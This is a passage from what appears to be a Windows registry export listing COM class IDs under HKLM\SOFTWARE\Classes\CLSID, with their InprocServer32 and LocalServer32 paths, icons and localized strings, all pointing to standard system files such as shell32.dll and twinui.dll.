HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1d2b8d89-9324-46a0-b797-5725d8c8d881}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\sdengin2.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1D3529C7-671A-468d-AD2A-499A96B073D1}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\WLanHC.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1D5532BB-1E08-4002-8445-8BA35E462045}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\hotplug.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1D583ABC-8A0E-4657-9982-A380CA58FB4B}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1D6322AD-AA85-4EF5-A828-86D71067D145}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\UIAnimation.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1D858A97-49A3-4805-8390-3BD5976E7ABB}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1d8a9b47-3a28-4ce2-8a4b-bd34e45bceeb}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\upnp.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1DCB3A00-33ED-11D3-8470-00C04F79DBC0}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\System32\wmdmps.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1DF7C823-B2D4-4B54-975A-F2AC5D7CF8B8}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\mstscax.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1E1714A3-50B9-480b-A94A-636D9A9B56D1} LocalizedString REG_EXPAND_SZ @%SystemRoot%\\system32\\srchadmin.dll,-625 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1E1714A3-50B9-480b-A94A-636D9A9B56D1}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\srchadmin.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1E35B0D0-49F2-4ACB-A9A5-4D2DA8331B02}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1E589E9D-8A8D-46d9-A2F9-E6D4F8161EE9}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mfmpeg2srcsnk.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1E8F0D70-7399-41BF-8598-7949A2DEC898}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1e94e93c-852d-47fb-9197-7edeb41101b0}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\netcorehc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1ea5fb56-9ee8-47dc-8998-f45585c2e3e0}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\MFPlay.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1ee7337f-85ac-45e2-a23c-37c753209769}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SmartcardCredentialProvider.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1eeb5b5a-06fb-4732-96b3-975c0194eb39}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\explorerframe.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1EF94880-01A8-11D2-A90B-00AA00BF3363}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\dsprov.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f01f4e9-8b75-4e20-8eb0-e49f17f2be61}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\WwanConn.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F046ABF-3202-4DC1-8CB5-3C67617CE1FA}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\dwmapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F068127-5760-490e-998C-6E35B845F49E}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\provsvc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f09b058-f3fd-4a9d-a8ba-a8a05f8fe283}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\msdtcuiu.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F0BC6AD-46D4-488B-BE1F-047FC7505E60}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\wbemcore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f2e5c40-9550-11ce-99d2-00aa006e086c} LocalizedString REG_EXPAND_SZ @%systemroot%\system32\rshx32.DLL,-59 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f2e5c40-9550-11ce-99d2-00aa006e086c}\Elevation IconReference REG_EXPAND_SZ @%systemroot%\system32\imageres.dll,-3 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f2e5c40-9550-11ce-99d2-00aa006e086c}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\rshx32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f3d8aa5-9ebf-4ee4-85c2-ea40379aede8}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\sdiageng.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\propsys.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F5EEC01-1214-4D94-80C5-4BDCD2014DDD}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\azroleui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F7D1BE9-7A50-40b6-A605-C4F3696F49C0}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\eapp3hst.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f849cce-2546-4b9f-b03e-4004781bdc40}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\explorerframe.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44d5-8C73-4EFFB68962F2}\LocalServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\wmiprvse.exe -secured ServerExecutable REG_EXPAND_SZ %systemroot%\system32\wbem\wmiprvse.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F872270-D68C-4C28-85D9-70CD5FC47A70}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f9a2c18-d89e-463e-b4f4-bb90152acc64}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mfmkvsrcsnk.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1FA9085F-25A2-489B-85D4-86326EEDCD87} InfoTip REG_EXPAND_SZ @%SystemRoot%\system32\wlanpref.dll,-20002 LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\wlanpref.dll,-20001 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1FA9085F-25A2-489B-85D4-86326EEDCD87}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\wlanpref.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1FA9085F-25A2-489B-85D4-86326EEDCD87}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\wlanpref.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1fb2a002-4c6c-4de7-85c2-cb8db9a4f728} LocalizedString REG_EXPAND_SZ @%systemroot%\system32\dskquoui.dll,-40615 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1fda955b-61ff-11da-978c-0008744faab7} LocalizedString REG_EXPAND_SZ @%systemroot%\system32\dtsh.dll,-40001 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1fda955b-61ff-11da-978c-0008744faab7}\Elevation IconReference REG_EXPAND_SZ @%SystemRoot%\system32\dtsh.dll,-40002 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1fda955b-61ff-11da-978c-0008744faab7}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\dtsh.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1fda955c-61ff-11da-978c-0008744faab7}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\dtsh.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1FE45ED3-B842-4CF2-8DF6-43E3D6D10E64}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\audiokse.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20076C7E-4851-41ed-9EB8-F4E5F2BB0286}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\srchadmin.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{201600d8-6eff-48ce-b842-e14d37a0682d}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\wpninprc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20404060-F24F-4F89-84C6-8AF80B0A17CB}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\audiokse.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20425B74-41F5-426F-A145-13BBB45A2F66}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\oobe\msoobeplugins.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{205447d9-4af1-4f97-a773-e10ff2e44ead}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2087c2f4-2cef-4953-a8ab-66779b670495}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\winhttpcom.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D} InfoTip REG_EXPAND_SZ @%SystemRoot%\system32\shell32.dll,-22912 LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\shell32.dll,-9217 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\imageres.dll,-25 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\shell\find (Default) REG_EXPAND_SZ @%SystemRoot%\system32\shell32.dll,-29188 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\shell\find\command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{209D8461-E6FB-49DD-A824-C9962A9D2F2B}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Common\sapi_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20b1cb23-6968-4eb9-b7d4-a66d00d07cee}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D} InfoTip REG_EXPAND_SZ @%SystemRoot%\system32\shell32.dll,-22913 LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\windows.storage.dll,-9216 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\imageres.dll,-109 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\find (Default) REG_EXPAND_SZ @%SystemRoot%\system32\windows.storage.dll,-8503 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\find\command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Manage (Default) REG_EXPAND_SZ @%systemroot%\system32\mycomput.dll,-400 MUIVerb REG_EXPAND_SZ @%systemroot%\system32\mycomput.dll,-400 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Manage\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\CompMgmtLauncher.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20E25881-F081-448e-85C9-4707A9400593}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\profprov.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20E8B2FE-7568-46AE-A0DB-76B7F469B92D}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\explorerframe.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{210DDC43-689C-46E3-BDC1-38C16C8F4C96}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Common\sapi_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2135f72a-90b5-4ed3-a7f1-8bb705ac276a}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\credprovslegacy.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{214DFBF5-5983-4B54-996D-B7FC67E0A1FD}\InProcHandler32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\Windows.Storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{21690A61-3629-4E3B-A72D-BBC8A88DB81F} LocalizedString REG_EXPAND_SZ @%systemroot%\system32\wuapi.dll,-63528 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{217700E0-2001-11DF-ADB9-F4CE462D9137}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\provcore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{217700E0-2003-11DF-ADB9-F4CE462D9137}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\provcore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{217700E0-2004-11DF-ADB9-F4CE462D9137}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\provcore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{217700E0-2005-11DF-ADB9-F4CE462D9137}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\provcore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{217FC9C0-3AEA-1069-A2DB-08002B30309D}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{21B22460-3AEA-1069-A2DC-08002B30309D}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{21EC2020-3AEA-1069-A2DD-08002B30309D} InfoTip REG_EXPAND_SZ @%SystemRoot%\system32\shell32.dll,-31361 LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\shell32.dll,-32012 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{21EC2020-3AEA-1069-A2DD-08002B30309D}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\imageres.dll,-27 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{21EC2020-3AEA-1069-A2DD-08002B30309D}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{21F71DD1-2398-4150-825A-CBDE00272EE4}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{220898A1-E3F3-46B4-96EA-B0855DC968B6}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2227A280-3AEA-1069-A2DE-08002B30309D} InfoTip REG_EXPAND_SZ @%SystemRoot%\system32\prnfldr.dll,-8062 LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\prnfldr.dll,-8036 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2227A280-3AEA-1069-A2DE-08002B30309D}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\imageres.dll,-26 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2227A280-3AEA-1069-A2DE-08002B30309D}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\prnfldr.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2269DAA3-2A9F-4165-A501-CE00A6F7A75B}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\wwanapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{227C5B36-F148-4B4B-AEC1-943E394D9885}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\wfascim.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{227ec397-6791-4ac6-a762-2f70f99015c2}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\iasrecst.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{22877a6d-37a1-461a-91b0-dbda5aaebc99} LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\shell32.dll,-37217 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{22877a6d-37a1-461a-91b0-dbda5aaebc99}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\imageres.dll,-117 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{22877a6d-37a1-461a-91b0-dbda5aaebc99}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{228D9A81-C302-11cf-9AA4-00AA004A5691}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\adsldp.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{228D9A82-C302-11cf-9AA4-00AA004A5691}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\adsldp.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{22A7E88C-5BF5-4DE6-B687-60F7331DF190}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\mstscax.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{22C21F93-7DDB-411C-9B17-C5B7BD064ABC}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecsext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{22c6c651-f6ea-46be-bc83-54e83314c67f}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{22D8B4F2-F577-4adb-A335-C2AE88416FAB}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\StructuredQuery.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{22ff30d1-a59e-4580-9190-da3042ceca64}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\WwanConn.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{233664b0-0367-11cf-abc4-02608c9e7553}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\activeds.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{23571E11-E545-4DD8-A337-B89BF44B10DF}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\SensorsApi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{23B77E99-5C2D-482D-A795-62CA3AE5B673}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\wmipiprt.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{23C1F3CF-C110-4512-ACA9-7B6174ECE888}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\DeviceSetupManagerAPI.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{23CF860E-9D2C-451A-8E83-C79C848D85A6}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\sxproxy.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{24264891-E80B-4fd3-B7CE-4FF2FAE8931F}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\StructuredQuery.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{242A95A9-8D6C-4974-A5DA-D9B6C9E619B8}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{24400D16-5754-11d2-8218-00C04FB687DA}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\DATACLEN.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{24AC8F2B-4D4A-4C17-9607-6A4B14068F97}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {24AC8F2B-4D4A-4C17-9607-6A4B14068F97} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{24ad3ad4-a569-4530-98e1-ab02f9417aa8} Infotip REG_EXPAND_SZ @%SystemRoot%\system32\shell32.dll,-12688 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{24ad3ad4-a569-4530-98e1-ab02f9417aa8}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\imageres.dll,-113 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{24ad3ad4-a569-4530-98e1-ab02f9417aa8}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{24CA8AEF-F6D8-4732-8DB5-9D83EFD8CFBC}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\oobe\msoobedui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{24D568C5-F3AE-4F91-9CD9-AA18876DA7C2}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\hgcpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{24DF3111-8474-4955-AA18-F6750BAD2A2B}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\DeviceSetupManagerAPI.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{250e91a0-0367-11cf-abc4-02608c9e7553}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\adsnt.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25150040-b8f1-418e-af61-b51071ac1ee2}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{251b1498-5cba-4bee-8242-2f57773151aa}\InProcHandler32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\Windows.Storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25256c24-3b75-49b3-a433-4bb2f8865896}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SearchFolder.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25585dc7-4da0-438d-ad04-e42c8d2d64b9}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2559a1f0-21d7-11d4-bdaf-00c04f60b9f0} LocalizedString REG_EXPAND_SZ @%SystemRoot%\explorer.exe,-7020 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2559a1f0-21d7-11d4-bdaf-00c04f60b9f0}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\imageres.dll,-177 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2559a1f0-21d7-11d4-bdaf-00c04f60b9f0}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2559a1f2-21d7-11d4-bdaf-00c04f60b9f0} LocalizedString REG_EXPAND_SZ @%SystemRoot%\explorer.exe,-7022 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2559a1f2-21d7-11d4-bdaf-00c04f60b9f0}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\shell32.dll,-48 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2559a1f2-21d7-11d4-bdaf-00c04f60b9f0}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2559a1f3-21d7-11d4-bdaf-00c04f60b9f0} LocalizedString REG_EXPAND_SZ @%SystemRoot%\explorer.exe,-7023 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2559a1f3-21d7-11d4-bdaf-00c04f60b9f0}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\imageres.dll,-100 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2559a1f3-21d7-11d4-bdaf-00c04f60b9f0}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2559a1f5-21d7-11d4-bdaf-00c04f60b9f0} LocalizedString REG_EXPAND_SZ @%SystemRoot%\explorer.exe,-7025 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2559a1f5-21d7-11d4-bdaf-00c04f60b9f0}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\explorer.exe,-254 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2559a1f5-21d7-11d4-bdaf-00c04f60b9f0}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2559a1f7-21d7-11d4-bdaf-00c04f60b9f0} LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\appwiz.cpl,-130 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2559a1f7-21d7-11d4-bdaf-00c04f60b9f0}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\imageres.dll,-24 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2559a1f7-21d7-11d4-bdaf-00c04f60b9f0}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2559a1f8-21d7-11d4-bdaf-00c04f60b9f0}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{255a6fda-6f93-4e8a-9611-ded1169eefb4}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mfsrcsnk.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25ab468c-3974-4075-be50-193135461727}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25B25D91-69A2-47fa-A375-FDC98189A06F}\LocalServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\SyncHost.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25BAAD81-3560-11D3-8471-00C04F79DBC0}\InprocServer32 (Default) 